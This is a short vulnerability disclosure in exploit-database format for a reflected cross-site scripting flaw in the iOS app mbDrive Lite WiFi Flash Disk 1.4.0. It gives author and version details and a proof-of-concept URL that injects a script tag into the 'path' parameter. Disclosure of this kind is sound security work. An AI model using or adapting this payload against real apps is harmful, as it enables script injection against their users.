mbDrive Lite WiFi Flash Disk version 1.4.0 suffers from a cross site scripting vulnerability.
# Exploit Title: mbDrive Lite - WiFi flash disk 1.4.0 Reflected XSS
# Date: Sep 8, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage:
https://apps.apple.com/us/developer/haw-yuan-yang/id291212805
# Software Link:
https://apps.apple.com/us/app/mbdrive-lite-wifi-flash-disk/id343254033
# Version: 1.4.0
# Tested on: iPhone ios 15.6
poc:
http://192.168.1.187:8080/list?path=%3Cscript%3Ealert(%271%27);%3C/script%3E
